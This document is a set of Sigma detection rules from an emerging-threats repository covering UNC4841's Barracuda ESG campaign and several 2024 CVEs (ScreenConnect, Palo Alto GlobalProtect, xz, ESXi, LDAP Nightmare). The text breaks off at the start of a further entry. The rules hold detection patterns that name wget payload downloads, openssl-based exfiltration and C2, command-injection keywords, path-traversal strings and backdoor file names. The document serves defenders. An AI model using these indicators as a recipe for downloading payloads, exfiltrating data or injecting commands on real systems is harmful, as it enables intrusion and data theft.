    "content": "# UNC4841 Exploiting Barracuda ESG Zero-Day Vulnerability\n\n## Summary\n\nOn May 23, 2023, Barracuda announced that a zero-day vulnerability (CVE-2023-2868) in the Barracuda Email Security Gateway (ESG) had been exploited in-the-wild as early as October 2022 and that they engaged Mandiant to assist in the investigation. Through the investigation, Mandiant identified a suspected China-nexus actor, currently tracked as UNC4841, targeting a subset of Barracuda ESG appliances to utilize as a vector for espionage, spanning a multitude of regions and sectors. Mandiant assesses with high confidence that UNC4841 is an espionage actor behind this wide-ranging campaign in support of the People’s Republic of China.\n\nYou can find more information on the threat in the following articles:\n\n- [Barracuda ESG Zero-Day Vulnerability (CVE-2023-2868) Exploited Globally by Aggressive and Skilled Actor, Suspected Links to China](https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally)\n- [Barracuda ESG: CVE-2023-2868 Hardening Recommendations](https://mandiant.widen.net/s/qwlxddwdg6/barracuda-cve-2023-2868-hardening)\n\n## Rules\n\n- [UNC4841 - Email Exfiltration File Pattern](./file_event_lnx_apt_unc4841_exfil_mail_pattern.yml)\n- [UNC4841 - Barracuda ESG Exploitation Indicators](./file_event_lnx_apt_unc4841_file_indicators.yml)\n- [UNC4841 - SSL Certificate Exfiltration Via Openssl](./proc_creation_lnx_apt_unc4841_openssl_connection.yml)\n- [UNC4841 - Download Compressed Files From Temp.sh Using Wget](./proc_creation_lnx_apt_unc4841_wget_download_compressed_file_tmep_sh.yml)\n- [UNC4841 - Download Tar File From Untrusted Direct IP Via Wget](./proc_creation_lnx_apt_unc4841_wget_download_tar_files_direct_ip.yml)\n- [UNC4841 - Potential SEASPY Execution](./proc_creation_lnx_atp_unc4841_seaspy_execution.yml)\n\n> **Note**\n>\n> The detection and hunting rules provided for this threat might produce false positives when used outside of the context of incident response or compromise assessment. They are meant to be run and executed on affected systems and environments to look for signs of compromise.\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation/file_event_lnx_apt_unc4841_exfil_mail_pattern.yml",
    "content": "title: UNC4841 - Email Exfiltration File Pattern\nid: 0785f462-60b0-4031-9ff4-b4f3a0ba589a\nstatus: test\ndescription: Detects filename pattern of email related data used by UNC4841 for staging and exfiltration\nreferences:\n    - https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-06-16\ntags:\n    - attack.execution\n    - attack.persistence\n    - attack.defense-evasion\n    - detection.emerging-threats\nlogsource:\n    product: linux\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|re: '/mail/tmp/[a-zA-Z0-9]{3}[0-9]{3}\\.tar\\.gz'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation/file_event_lnx_apt_unc4841_file_indicators.yml",
    "content": "title: UNC4841 - Barracuda ESG Exploitation Indicators\nid: 5627c337-a9b2-407a-a82d-5fd97035ff39\nstatus: test\ndescription: Detects file indicators as seen used by UNC4841 during their Barracuda ESG zero day exploitation.\nreferences:\n    - https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-06-16\nmodified: 2025-08-19\ntags:\n    - attack.execution\n    - attack.persistence\n    - attack.defense-evasion\n    - detection.emerging-threats\nlogsource:\n    product: linux\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|endswith:\n            - '/11111.tar'\n            - '/aacore.sh'\n            - '/appcheck.sh'\n            - '/autoins'\n            - '/BarracudaMailService'\n            - '/etc/cron.daily/core_check.sh'\n            - '/etc/cron.daily/core.sh'\n            - '/etc/cron.hourly/aacore.sh'\n            - '/etc/cron.hourly/appcheck.sh'\n            - '/etc/cron.hourly/core.sh'\n            - '/get_fs_info.pl'\n            - '/imgdata.jpg'\n            - '/install_att_v2.tar'\n            - '/install_bvp74_auth.tar'\n            - '/install_helo.tar'\n            - '/install_reuse.tar'\n            - '/intent_helo'\n            - '/intent_reuse'\n            - '/intentbas'\n            # - '/mknod'\n            - '/mod_attachment.lua'\n            - '/mod_content.lua'\n            - '/mod_require_helo.lua'\n            - '/mod_rtf'\n            - '/mod_sender.lua'\n            - '/mod_udp.so'\n            - '/nfsd_stub.ko'\n            - '/resize_reisertab'\n            - '/resize_risertab'\n            - '/resize2fstab'\n            - '/rverify'\n            - '/saslautchd'\n            - '/sendscd'\n            - '/snapshot.tar'\n            - '/tmp/p'\n            - '/tmp/p7'\n            - '/tmp/t'\n            - '/update_v2.sh'\n            - '/update_v31.sh'\n            - '/update_v35.sh'\n            - '/update_version'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation/proc_creation_lnx_apt_unc4841_openssl_connection.yml",
    "content": "title: UNC4841 - SSL Certificate Exfiltration Via Openssl\nid: 60911c07-f989-4362-84af-c609828ef829\nstatus: test\ndescription: Detects the execution of \"openssl\" to connect to an IP address. This techniques was used by UNC4841 to exfiltrate SSL certificates and as a C2 channel with named pipes. Investigate commands executed in the temporal vicinity of this command.\nreferences:\n    - https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-06-16\ntags:\n    - attack.defense-evasion\n    - attack.t1140\n    - detection.emerging-threats\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith: '/openssl'\n        CommandLine|re: '[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}'\n        CommandLine|contains|all:\n            - 's_client'\n            - '-quiet'\n            - '-connect'\n        CommandLine|contains:\n            - ':443'\n            - ':8080'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation/proc_creation_lnx_apt_unc4841_wget_download_compressed_file_tmep_sh.yml",
    "content": "title: UNC4841 - Download Compressed Files From Temp.sh Using Wget\nid: 60d050c4-e253-4d9a-b673-5ac100cfddfb\nstatus: test\ndescription: Detects execution of \"wget\" to download a \".zip\" or \".rar\" files from \"temp.sh\". As seen used by UNC4841 during their Barracuda ESG zero day exploitation.\nreferences:\n    - https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-06-16\ntags:\n    - attack.defense-evasion\n    - attack.t1140\n    - detection.emerging-threats\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith: '/wget'\n        CommandLine|contains: 'https://temp.sh/'\n        CommandLine|endswith:\n            - '.rar'\n            - '.zip'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation/proc_creation_lnx_apt_unc4841_wget_download_tar_files_direct_ip.yml",
    "content": "title: UNC4841 - Download Tar File From Untrusted Direct IP Via Wget\nid: 23835beb-ec38-4e74-a5d4-b99af6684e91\nstatus: test\ndescription: Detects execution of \"wget\" to download a \"tar\" from an IP address that doesn't have a trusted certificate. As seen used by UNC4841 during their Barracuda ESG zero day exploitation.\nreferences:\n    - https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-06-16\ntags:\n    - attack.defense-evasion\n    - attack.t1140\n    - detection.emerging-threats\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith: '/wget'\n        CommandLine|re: 'https://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}'\n        CommandLine|contains: '--no-check-certificate'\n        CommandLine|endswith: '.tar'\n    filter_main_local_ips:\n        # Note: Uncomment this filter if you want to exclude local IPs\n        CommandLine|contains:\n            - 'https://10.' # 10.0.0.0/8\n            - 'https://192.168.' # 192.168.0.0/16\n            - 'https://172.16.' # 172.16.0.0/12\n            - 'https://172.17.'\n            - 'https://172.18.'\n            - 'https://172.19.'\n            - 'https://172.20.'\n            - 'https://172.21.'\n            - 'https://172.22.'\n            - 'https://172.23.'\n            - 'https://172.24.'\n            - 'https://172.25.'\n            - 'https://172.26.'\n            - 'https://172.27.'\n            - 'https://172.28.'\n            - 'https://172.29.'\n            - 'https://172.30.'\n            - 'https://172.31.'\n            - 'https://127.' # 127.0.0.0/8\n            - 'https://169.254.' # 169.254.0.0/16\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation/proc_creation_lnx_atp_unc4841_seaspy_execution.yml",
    "content": "title: UNC4841 - Potential SEASPY Execution\nid: f6a711f3-d032-4f9e-890b-bbe776236c84\nstatus: test\ndescription: Detects execution of specific named binaries which were used by UNC4841 to deploy their SEASPY backdoor\nreferences:\n    - https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-06-16\ntags:\n    - attack.execution\n    - detection.emerging-threats\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith:\n            - '/BarracudaMailService'\n            - '/resize2fstab'\n            - '/resize_reisertab'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2024/Exploits/CVE-2024-1212/web_exploit_cve_2024_1212_.yml",
    "content": "title: CVE-2024-1212 Exploitation - Progress Kemp LoadMaster Unauthenticated Command Injection\nid: eafb8bd5-7605-4bfe-a9ec-0442bc151f15\nstatus: test\ndescription: |\n    Detects potential exploitation of CVE-2024-1709 an unauthenticated command injection in Progress Kemp LoadMaster.\n    It looks for GET requests to '/access/set' API with the parameters 'param=enableapi' and 'value=1' as well as an \"Authorization\" header with a base64 encoded value with an uncommon character.\nreferences:\n    - https://github.com/RhinoSecurityLabs/CVEs/blob/15cf4d86c83daa57b59eaa2542a0ed47ad3dc32d/CVE-2024-1212/CVE-2024-1212.py\n    - https://rhinosecuritylabs.com/research/cve-2024-1212unauthenticated-command-injection-in-progress-kemp-loadmaster/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-03-20\ntags:\n    - attack.initial-access\n    - cve.2024-1212\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection_path:\n        cs-method: 'GET'\n        cs-uri-stem|contains|all:\n            - '/access/set'\n            - 'param=enableapi'\n            - 'value=1'\n    selection_keywords:\n        - 'Basic Jz'\n        - 'Basic c7'\n        - 'Basic nO'\n        - \"Basic ';\"\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2024/Exploits/CVE-2024-1708/file_event_win_exploit_cve_2024_1708_screenconnect.yml",
    "content": "title: CVE-2024-1708 - ScreenConnect Path Traversal Exploitation\nid: 44d7af7e-88e6-4490-be11-55f7ff4d9fc1\nrelated:\n    - id: 4c198a60-7d05-4daf-8bf7-4136fb6f5c62\n      type: similar\nstatus: test\ndescription: |\n    This detects file modifications to ASPX and ASHX files within the root of the App_Extensions directory, which is allowed by a ZipSlip vulnerability in versions prior to 23.9.8. This occurs during exploitation of CVE-2024-1708.\nreferences:\n    - https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8\n    - https://www.cve.org/CVERecord?id=CVE-2024-1709\n    - https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass\nauthor: Matt Anderson, Andrew Schwartz, Caleb Stewart, Huntress\ndate: 2024-02-21\ntags:\n    - attack.persistence\n    - cve.2024-1708\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        Image|endswith: '\\ScreenConnect.Service.exe'\n        TargetFilename|endswith:\n            - 'ScreenConnect\\\\App_Extensions\\\\*.ashx'\n            - 'ScreenConnect\\\\App_Extensions\\\\*.aspx'\n    filter_main_legit_extension:\n        TargetFilename|contains: 'ScreenConnect\\App_Extensions\\\\*\\\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - This will occur legitimately as well and will result in some benign activity.\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2024/Exploits/CVE-2024-1708/win_security_exploit_cve_2024_1708_screenconnect.yml",
    "content": "title: CVE-2024-1708 - ScreenConnect Path Traversal Exploitation - Security\nid: 4c198a60-7d05-4daf-8bf7-4136fb6f5c62\nrelated:\n    - id: 44d7af7e-88e6-4490-be11-55f7ff4d9fc1\n      type: similar\nstatus: test\ndescription: |\n    This detects file modifications to ASPX and ASHX files within the root of the App_Extensions directory, which is allowed by a ZipSlip vulnerability in versions prior to 23.9.8. This occurs during exploitation of CVE-2024-1708.\n    This requires an Advanced Auditing policy to log a successful Windows Event ID 4663 events and with a SACL set on the directory.\nreferences:\n    - https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8\n    - https://www.cve.org/CVERecord?id=CVE-2024-1708\n    - https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass\nauthor: Matt Anderson, Caleb Stewart, Huntress\ndate: 2024-02-20\ntags:\n    - attack.initial-access\n    - attack.persistence\n    - cve.2024-1708\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    service: security\n    definition: 'Requirements: SACLs must be enabled for the ScreenConnect directory'\ndetection:\n    selection:\n        EventID: 4663\n        ObjectType: 'File'\n        ProcessName|contains: 'ScreenConnect.Service.exe'\n        AccessMask: '0x6'\n        ObjectName|endswith:\n            - 'ScreenConnect\\\\App_Extensions\\\\*.ashx'\n            - 'ScreenConnect\\\\App_Extensions\\\\*.aspx'\n    filter_main_legit_extension:\n        ObjectName|contains: 'ScreenConnect\\App_Extensions\\\\*\\\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2024/Exploits/CVE-2024-1709/file_event_win_exploit_cve_2024_1709_user_database_modification_screenconnect.yml",
    "content": "title: ScreenConnect User Database Modification\nid: 1a821580-588b-4323-9422-660f7e131020\nrelated:\n    - id: 4109cb6a-a4af-438a-9f0c-056abba41c6f\n      type: similar\nstatus: test\ndescription: |\n    Detects file modifications to the temporary xml user database file indicating local user modification in the ScreenConnect server.\n    This will occur during exploitation of the ScreenConnect Authentication Bypass vulnerability (CVE-2024-1709) in versions <23.9.8, but may also be observed when making legitimate modifications to local users or permissions.\nreferences:\n    - https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8\n    - https://www.cve.org/CVERecord?id=CVE-2024-1709\n    - https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass\nauthor: Matt Anderson, Andrew Schwartz, Caleb Stewart, Huntress\ndate: 2024-02-21\ntags:\n    - attack.persistence\n    - cve.2024-1709\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|endswith: '.xml'\n        TargetFilename|contains|all:\n            - 'Temp'\n            - 'ScreenConnect'\n        Image|endswith: '\\ScreenConnect.Service.exe'\n    condition: selection\nfalsepositives:\n    - This will occur legitimately as well and will result in some benign activity.\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2024/Exploits/CVE-2024-1709/web_exploit_cve_2024_1709_screenconnect.yml",
    "content": "title: CVE-2024-1709 - ScreenConnect Authentication Bypass Exploitation\nid: d27eabad-9068-401a-b0d6-9eac744d6e67\nstatus: test\ndescription: |\n    Detects GET requests to '/SetupWizard.aspx/[anythinghere]' that indicate exploitation of the ScreenConnect vulnerability CVE-2024-1709.\nreferences:\n    - https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8\n    - https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass\n    - https://www.cve.org/CVERecord?id=CVE-2024-1709\nauthor: Matt Anderson, Huntress\ndate: 2024-02-20\ntags:\n    - attack.initial-access\n    - attack.persistence\n    - cve.2024-1709\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-uri-stem|contains: '/SetupWizard.aspx/'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2024/Exploits/CVE-2024-1709/win_security_exploit_cve_2024_1709_user_database_modification_screenconnect.yml",
    "content": "title: ScreenConnect User Database Modification - Security\nid: 4109cb6a-a4af-438a-9f0c-056abba41c6f\nrelated:\n    - id: 1a821580-588b-4323-9422-660f7e131020\n      type: similar\nstatus: test\ndescription: |\n    This detects file modifications to the temporary xml user database file indicating local user modification in the ScreenConnect server.\n    This will occur during exploitation of the ScreenConnect Authentication Bypass vulnerability (CVE-2024-1709) in versions <23.9.8, but may also be observed when making legitimate modifications to local users or permissions.\n    This requires an Advanced Auditing policy to log a successful Windows Event ID 4663 events and with a SACL set on the directory.\nreferences:\n    - https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8\n    - https://www.cve.org/CVERecord?id=CVE-2024-1709\n    - https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass\nauthor: Matt Anderson, Kris Luzadre, Andrew Schwartz, Huntress\ndate: 2024-02-20\ntags:\n    - attack.defense-evasion\n    - cve.2024-1709\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    service: security\n    definition: 'Requirements: SACLs must be enabled for the ScreenConnect directory'\ndetection:\n    selection:\n        EventID: 4663\n        ObjectType: 'File'\n        AccessMask: '0x6'\n        ObjectName|endswith: '.xml'\n        ObjectName|contains|all:\n            - 'Temp'\n            - 'ScreenConnect'\n        ProcessName|contains: 'ScreenConnect.Service.exe'\n    condition: selection\nfalsepositives:\n    - This will occur legitimately as well and will result in some benign activity.\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2024/Exploits/CVE-2024-3094/proc_creation_lnx_exploit_cve_2024_3094_sshd_child_process.yml",
    "content": "title: Potential Exploitation of CVE-2024-3094 - Suspicious SSH Child Process\nid: 9aa27839-e8ba-4d7a-ac1a-746c22c3d1e5\nstatus: test\ndescription: |\n    Detects potentially suspicious child process of SSH process (sshd) with a specific execution user. This could be a sign of potential exploitation of CVE-2024-3094.\nreferences:\n    - https://github.com/amlweems/xzbot?tab=readme-ov-file#backdoor-demo\nauthor: Arnim Rupp, Nasreddine Bencherchali, Thomas Patzke\ndate: 2024-04-01\nmodified: 2024-07-03\ntags:\n    - attack.execution\n    - cve.2024-3094\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        ParentImage|endswith: '/sshd'\n        CommandLine|startswith:\n            - 'bash -c'\n            - 'sh -c'\n        User: 'root'\n    condition: selection\nfalsepositives:\n    - Administrative activity directly with root authentication might trigger this rule if it's unnecessarily prefixed with \"sh -c\" or \"bash -c\"\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2024/Exploits/CVE-2024-3400/file_event_paloalto_globalprotect_exploit_cve_2024_3400_command_inject_file_creation.yml",
    "content": "title: Potential CVE-2024-3400 Exploitation - Palo Alto GlobalProtect OS Command Injection - File Creation\nid: bcd95697-e3e7-4c6f-8584-8e3503e6929f\nstatus: test\ndescription: |\n    Detects suspicious file creations in the Palo Alto Networks PAN-OS' parent telemetry folder, which are processed by the vulnerable 'dt_curl' script if device telemetry is enabled.\n    As said script overrides the shell-subprocess restriction, arbitrary command execution may occur by carefully crafting filenames that are escaped through this function.\nreferences:\n    - https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/\n    - https://nvd.nist.gov/vuln/detail/CVE-2024-3400\nauthor: Andreas Braathen (mnemonic.io)\ndate: 2024-04-25\ntags:\n    - attack.execution\n    - cve.2024-3400\n    - detection.emerging-threats\nlogsource:\n    product: paloalto\n    service: globalprotect\n    category: file_event\n    definition: 'Requirements: file creation events need to be ingested from the Palo Alto GlobalProtect appliance'\ndetection:\n    selection:\n        TargetFilename|contains:\n            - '{IFS}'\n            - 'base64'\n            - 'bash'\n            - 'curl'\n            - 'http'\n        TargetFilename|startswith: '/opt/panlogs/tmp/device_telemetry/'\n    condition: selection\nfalsepositives:\n    - The PAN-OS device telemetry function does not enforce a standard filename convention, but observations are unlikely.\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2024/Exploits/CVE-2024-3400/paloalto_globalprotect_exploit_cve_2024_3400_command_injection.yml",
    "content": "title: Potential CVE-2024-3400 Exploitation - Palo Alto GlobalProtect OS Command Injection\nid: f130a5f1-73ba-42f0-bf1e-b66a8361cb8f\nstatus: test\ndescription: |\n    Detects potential exploitation attempts of CVE-2024-3400 - an OS command injection in Palo Alto GlobalProtect.\n    This detection looks for suspicious strings that indicate a potential directory traversal attempt or command injection.\nreferences:\n    - https://security.paloaltonetworks.com/CVE-2024-3400\n    - https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/\n    - https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-04-18\nmodified: 2025-11-22\ntags:\n    - attack.initial-access\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - cve.2024-3400\n    - detection.emerging-threats\nlogsource:\n    category: appliance\n    product: paloalto\n    service: globalprotect\n    definition: 'Requirements: Palo Alto GlobalProtect \"mp-log\" and \"gpsvc.log\" log files need to be ingested'\ndetection:\n    keywords_generic:\n        - 'failed to unmarshal session(../'\n        - 'failed to unmarshal session(./../'\n        - 'failed to unmarshal session(/..'\n        - 'failed to unmarshal session(%2E%2E%2F'\n        - 'failed to unmarshal session(%2F%2E%2E'\n        - 'failed to unmarshal session(%2E%2F%2E%2E%2F'\n        - 'failed to unmarshal session(%252E%252E%252F'\n        - 'failed to unmarshal session(%252F%252E%252E'\n        - 'failed to unmarshal session(%252E%252F%252E%252E%252F'\n    keywords_telemetry_exploit:\n        - '{IFS}'\n        - 'base64'\n        - 'bash'\n        - 'curl'\n        - 'http'\n    keywords_telemetry_path:\n        - '/opt/panlogs/tmp/device_telemetry/'\n    condition: keywords_generic or (keywords_telemetry_exploit and keywords_telemetry_path)\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2024/Exploits/CVE-2024-35250/image_load_exploit_cve_2024_35250_privilege_escalation.yml",
    "content": "title: Potential CVE-2024-35250 Exploitation Activity\nid: 17ce9373-2163-4a2c-90ba-f91e9ef7a8c1\nstatus: experimental\ndescription: |\n    Detects potentially suspicious loading of \"ksproxy.ax\", which may indicate an attempt to exploit CVE-2024-35250.\nreferences:\n    - https://thehackernews.com/2024/12/cisa-and-fbi-raise-alerts-on-exploited.html\n    - https://github.com/varwara/CVE-2024-35250\n    - https://devco.re/blog/2024/08/23/streaming-vulnerabilities-from-windows-kernel-proxying-to-kernel-part1-en/\n    - https://www.cisa.gov/known-exploited-vulnerabilities-catalog\nauthor: '@eyezuhk Isaac Fernandes'\ndate: 2025-02-19\ntags:\n    - attack.privilege-escalation\n    - attack.t1068\n    - cve.2024-35250\n    - detection.emerging-threats\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith: '\\ksproxy.ax'\n    filter_main_system_paths:\n        Image|startswith:\n            - 'C:\\Program Files\\'\n            - 'C:\\Program Files (x86)\\'\n            - 'C:\\Windows\\System32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n    filter_optional_teams:\n        Image|endswith: '\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe'\n    filter_optional_zoom:\n        Image|endswith: '\\AppData\\Roaming\\Zoom\\bin\\Zoom.exe'\n    filter_optional_firefox:\n        Image|endswith: '\\AppData\\Local\\Mozilla Firefox\\firefox.exe'\n    filter_optional_chrome:\n        Image|endswith: '\\AppData\\Local\\Google\\Chrome\\Application\\chrome.exe'\n    filter_optional_opera:\n        Image|endswith: '\\AppData\\Local\\Programs\\Opera\\opera.exe'\n    filter_optional_discord:\n        Image|endswith: '\\AppData\\Local\\Discord\\app-*\\Discord.exe'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Legitimate applications that use Windows Stream Interface APIs.\n    - Media applications that use DirectShow filters.\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2024/Exploits/CVE-2024-37085/proc_creation_win_exploit_cve_2024_37085_esxi_admins_group_creation.yml",
    "content": "title: Potential Exploitation of CVE-2024-37085 - Suspicious Creation Of ESX Admins Group\nid: c408acfe-2870-41df-8d2f-9f4daa4555ed\nstatus: test\ndescription: |\n    Detects execution of the \"net.exe\" command in order to add a group named \"ESX Admins\".\n    This could indicates a potential exploitation attempt of CVE-2024-37085, which allows an attacker to elevate their privileges to full administrative access on an domain-joined ESXi hypervisor.\n    VMware ESXi hypervisors joined to an Active Directory domain consider any member of a domain group named \"ESX Admins\" to have full administrative access by default.\nreferences:\n    - https://www.microsoft.com/en-us/security/blog/2024/07/29/ransomware-operators-exploit-esxi-hypervisor-vulnerability-for-mass-encryption/\nauthor: frack113\ndate: 2024-07-29\ntags:\n    - attack.execution\n    - cve.2024-37085\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_net_img:\n        - Image|endswith:\n              - '\\net.exe'\n              - '\\net1.exe'\n        - OriginalFileName:\n              - 'net.exe'\n              - 'net1.exe'\n    selection_net_cmd:\n        CommandLine|contains|all:\n            - '/add'\n            - '/domain'\n            - 'ESX Admins'\n            - 'group'\n    selection_powershell_img:\n        - Image|endswith:\n              - '\\PowerShell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'PowerShell.exe'\n              - 'pwsh.dll'\n    selection_powershell_cli:\n        CommandLine|contains|all:\n            - 'New-ADGroup'\n            - 'ESX Admins'\n    condition: all of selection_net_* or all of selection_powershell_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2024/Exploits/CVE-2024-37085/win_security_exploit_cve_2024_37085_esxi_admins_group.yml",
    "content": "title: Potential Exploitation of CVE-2024-37085 - Suspicious ESX Admins Group Activity\nid: 47a1658b-67a4-48e2-8ab1-c10437fc0148\nstatus: test\ndescription: |\n    Detects any creation or modification to a windows domain group with the name \"ESX Admins\".\n    This could indicates a potential exploitation attempt of CVE-2024-37085, which allows an attacker to elevate their privileges to full administrative access on an domain-joined ESXi hypervisor.\n    VMware ESXi hypervisors joined to an Active Directory domain consider any member of a domain group named \"ESX Admins\" to have full administrative access by default.\nreferences:\n    - https://www.microsoft.com/en-us/security/blog/2024/07/29/ransomware-operators-exploit-esxi-hypervisor-vulnerability-for-mass-encryption/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-07-30\ntags:\n    - attack.execution\n    - cve.2024-37085\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID:\n            - 4727\n            - 4728\n            - 4731\n            - 4737\n            - 4754\n            - 4755\n            - 4756\n    keyword_group:\n        - 'ESX Admins'\n    condition: selection and keyword_group\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2024/Exploits/CVE-2024-49113/win_application_error_exploit_cve_2024_49113_ldap_nightmare.yml",
    "content": "title: CVE-2024-49113 Exploitation Attempt - LDAP Nightmare\nid: 3f2c93c7-7b2a-4d58-bb8d-6f39422d8148\nstatus: experimental\ndescription: |\n    Detects exploitation attempt of CVE-2024-49113 known as LDAP Nightmare, based on \"Application Error\" log where the faulting application is \"lsass.exe\" and the faulting module is \"WLDAP32.dll\".\nreferences:\n    - https://gist.github.com/travisbgreen/82b68bac499edbe0b17dcbfa0c5c71b7\n    - https://www.linkedin.com/feed/update/urn:li:activity:7282295814792605698/\nauthor: Samuel Monsempes\ndate: 2025-01-08\ntags:\n    - attack.impact\n    - attack.t1499\n    - cve.2024-49113\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    service: application\n    # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly\ndetection:\n    selection:\n        Provider_Name: 'Application Error'\n        EventID: 1000\n        Data|contains|all:\n            - 'lsass.exe'\n            - 'WLDAP32.dll'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2024/Exploits/CVE-2024-50623/proc_creation_win_exploit_cve_2024_50623_cleo.yml",
